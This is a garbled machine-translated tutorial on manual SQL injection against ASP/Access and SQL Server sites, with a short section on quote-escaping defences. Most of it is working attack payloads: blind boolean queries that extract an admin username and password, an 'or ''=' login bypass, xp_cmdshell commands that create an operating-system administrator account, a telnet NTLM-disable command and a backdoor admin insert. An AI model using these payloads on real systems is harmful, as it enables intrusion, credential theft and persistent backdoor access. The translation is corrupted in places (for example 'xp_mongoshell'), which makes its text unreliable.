ASP + ACCESS injection Basics

Instance: http://www.xxx.com/jiaren.asp? Id = 544
Okay. Now we start .....

1. Judgment

Use ';
Use and 1 = 1 and 1 = 2

Judgment is very important and the most important step, because if you do not know how to continue with manual injection ..
========================================================== ==========================================
'Back

Microsoft Jet Database Engine error '80040e14'

Syntax error (operator loss) in the query expression 'id = 544.

/Jiaren. asp, row 15

========================================================== ==========================================

; Returns the normal page

====================================
And 1 = 1 return to the normal page

======================================
And 1 = 2 Return Error Page

No:

ADODB. Field error '800a0bcd'

Either BOF or EOF is "true", or the current record has been deleted. The operation required requires a current record.

/Jiaren. asp, row 28
========================================================== ==============================================

We made a simple judgment above to know that the page has been injected. at this time, many friends will ask why there is injection. you only need to remember that we are judged by the difference in the returned page. only when the two returned pages are different can we know that they exist.

2. Guess the table
And 0 <> (select count (*) from *)
This is the most basic query statement in the most common sense. I will explain it to you as to the function of the statement. However, please refer to relevant SQL query information for details.

And 0 <> (select count (*) from Admin) --- determine whether the admin table exists

Here, admin can be changed. Do not change other parts.
The correct page we just returned indicates that the admin table exists. if the returned error description does not exist, we need to change it to another one. for example, and 0 <> (select count (*) from user). Of course, you can try it as long as you think of it. I gave you two tips in my class that day. I didn't expect many people to know them. I also asked if I could change Admin and user to another one. comrades, this admin user can be replaced. however, you don't need to change the name of a table. because you are guessing a table, you also need to think about it. is it useful to change to 123 456. no, because no one will use this table name.
Generally, the table name is nothing more than admin adminuser user pass password ..

3. Guess the number of accounts
And 0 <(select count (*) from Admin)
It is similar to the preceding statement. in fact, the query part is the same. The difference is the preceding number. this number is used to check the number of user accounts. yes. not fixed: 1 .. because we guess. that is, we do not know whether there are several accounts in the data in the table, so we have to guess. If it is fixed, we will not guess it ..
1 <that is to say, check if 1 is less than the number of accounts in it. If the returned page is correct, it is correct, if the error description is not, we need to replace it with 2 <3 <..... you can also use 1> 2> to guess.
If 0 is returned, the correct page is returned. 1 is returned. The error page indicates that the number of accounts is a specific number of mathematical indicators. I will not tell you how to determine the size.
Here I will show you, here I am judging from 0, and will definitely return the correct page because it is impossible for an administrator account to have none. an error is returned. it only has one administrator account. let's change to 1 = To see if OK is returned. The correct page indicates yes.
If there are several accounts, you need to know which account to guess.

4. Name of the field to be guessed
And 1 = (select count (*) from Admin where Len (name)> 0) User field name

And 1 = (select count (*) from Admin where Len (password)> 0) password field name

The name of the field in the table is guessed.
And 1 = (select count (*) from Admin where Len (*)> 0) --- this is the core statement. all we need to do is add the field name that we think of in Len () brackets.

Let's first guess the username field. I used name OK, right, so let's guess the password field.
I first use pass to get dizzy, so we can switch to password to see if OK is correct.
Then we can guess the user field and password field. below is the length and specific characters of the guess.

5. Guess the length of each field
To guess the length
And 1 = (select count (*) from Admin where Len (*)> 0)

> Replace 0 with another one? Return to the correct page. OK. Let's get started.
The first is the account length... the account field is name.
And 1 = (select count (*) from Admin where Len (name)> 0) Correct
And 1 = (select count (*) from Admin where Len (name)> 1) Correct
And 1 = (select count (*) from Admin where Len (name)> 2) Correct
And 1 = (select count (*) from Admin where Len (name)> 6) Error
And 1 = (select count (*) from Admin where Len (name)> 5) Correct
And 1 = (select count (*) from Admin where Len (name)> 4) Correct
Then we can know that the length is 6.
And 1 = (select count (*) from Admin where Len (name) = 6) Correct
Right. = 6. The returned page is the correct page.

Below is the length of the password field
And 1 = (select count (*) from Admin where Len (password)> 0) Correct
And 1 = (select count (*) from Admin where Len (password)> 6) Correct
And 1 = (select count (*) from Admin where Len (password)> 10) Correct
And 1 = (select count (*) from Admin where Len (password)> 15) Error
And 1 = (select count (*) from Admin where Len (password)> 14) Error
And 1 = (select count (*) from Admin where Len (password)> 13) Error
And 1 = (select count (*) from Admin where Len (password)> 12) Error
And 1 = (select count (*) from Admin where Len (password)> 11) Correct
The OK length is 12.

Name 6
Password 12

And the following are the specific characters.

6. escape characters
And 1 = (select count (*) from Admin where left (name, 1) = 'A') --- guess the user
And 1 = (select count (*) from Admin where left (password, 1) = 'A ')
In this way, you can add a character to guess the number of digits you have just guessed. Even if the account has come out

And 1 = (select count (*) from Admin where left (Pass, 1) = 'A') --- guess the password

Left (name, 1) = 'A' note that the position 1 is the location of the characters to be guessed.
And 1 = (select count (*) from Admin where left (name, 1) = 'A') --- guess the first account
And 1 = (select count (*) from Admin where left (name, 2) = 'AB') --- second place of the user account
In this way, you only need to guess.

And 1 = (select count (*) from Admin where left (name, 1) = 'A') Error
.....
And 1 = (select count (*) from Admin where left (name, 6) = 'pclzyq ')
Because the process of this guess is long, I will give the answer directly.

And 1 = (select count (*) from Admin where left (password, 1) = 'A') Error
.......
And 1 = (select count (*) from Admin where left (password, 12) = 'pclzyq000215 ')
The answer is provided directly.

Name = pclzyq
Password = pclzyq000215

7. Find the login port and log on
General logon Port:
Admin. asp
Admin_index.asp
Admin/index. asp
Admin/admin. asp
....
You can accumulate it by yourself. Don't forget to make it into a text file and send it to me.

Here we login port is under the http://www.xxx.com/admin.asp is login.

Let's write this in the background.ProgramIt is estimated that this login port has another problem.
Use 'or ''=' to log in and check it out. You can also go in if you see it.

Note:

Command: select
Meaning: select
Description: Used to find qualified records

Total addition function: Count
Quantity
Description: used to calculate the specified quantity.

Clause: From
Data Table
Description: used to specify a data table.

Clause: Where
Condition
Description: Used to set conditions.

Operator: and
And
Description: logical and

Top -- extract the previous data with the specified length
Select top 10 * from .....

And 1 = (select top 1 count (*) from Admin where ASC (mid (Pass, 5, 1) = 51) -- this query statement can be used to guess Chinese users and passwords. you only need to replace the following number with the Chinese assic code. finally, convert the result to a character.
----------------------------------------------------- Note
Create a database administrator account and a system administrator account through sqlserver injection vulnerability [the current account must be a SysAdmin Group]
News. asp? Id = 2; Exec master. DBO. sp_addlogin Test, test; -- // Add the database user test with the password Test
News. asp? Id = 2; Exec master. DBO. sp_password test, 123456, test; -- // if you want to change the password, use this sentence (change the password of test to 123456)
News. asp? Id = 2; Exec master. DBO. SP_ADDSRVROLEMEMBER test, SysAdmin; -- // Add test to the SysAdmin group. Members of this group can perform any operation
News. asp? Id = 2; Exec master. DBO. xp_mongoshell 'net user test/add'; -- // Add the System user test with the password Test
News. asp? Id = 2; Exec master. DBO. xp_mongoshell 'net localgroup administrators test/add'; -- // upgrade system user test to administrator
In this way, you have left the test administrator account in both the database and system.
2:
Replace (variable, "'", "'' ") with two single quotes.
For example
Sentences injected
Pwd = request. Form ("PWD ")
Name = request. Form ("name ")
There are no injection methods after modification Pwd = request. Form ("PWD ")
Name = request. Form ("name ")
Name = Replace (name ,"'","''")
Read it first and then judge it.
Or directly
Pwd = Replace (request. Form ("PWD "),"'","''")
Name = Replace (request. Form ("PWD "),"'","''")
3rd examples:
SQL = "select * from table where user ='' "& user &" ''and pass ='' "& pass &"''"
SQL = "select * from table where user ='' "& replace (user ,"''","''''") & "'' and pass = ''" & replace (pass ,"''","''''")&"''"
---------------------
If it is of the balanced type
Replace (string ,"'","''")
If it is a stored procedure
Replace (string ,"'","''''")
Isnumeric For numeric type
--------------------------------------------
For SQL injection, many sites begin to use the Replace (Request ("ID"), "'", "'' ") single quotes into two single quotes to filter,
You can also use Replace (Request ("ID"), "", "") to remove all spaces.
For filtering such as "select * From tablename where id = '" & replace (Request ("ID, currently, there is no cracking method,
However, many sites are filtered by select * From tablename where id = "& replace (Request (" ID,
Because the submitted parameters are not enclosed by single quotes twice, they only rely on single quotes to filter user data.
SQL Injection. This defense can cause normal SQL Injection failures, which is a semi-defense status of injection. But if we can avoid
If you open a single quotation mark, that defense is meaningless. The same applies to space filtering.

It is mainly used to transmit numeric variables:
Id = request. querystring ("ID") 'to obtain the passed ID
If not (isnumeric (ID) then' verification-if the ID is not the passed ID, then...
Response. Write "Invalid Address ~ "
Response. End
End if

Add the access injection point display directory
because sometimes we need to know which disk the website is on, which is only valid for the mdb database ..
http://www.252525.net/news.asp? Id = 1 and (select top 1 TMP from temp) = 1
supplement: Remove NTLM verification
run the command directly: tlntadmn config sec =-NTLM
the injection can run:; Exec master. DBO. xp_mongoshell 'tlntadmn config sec =-ntlm' --
Add an administrator to the database
; insert into admin (username, passwd, oskey) values ('ldwz ', '49ba59abbe56e057 ', 'super') --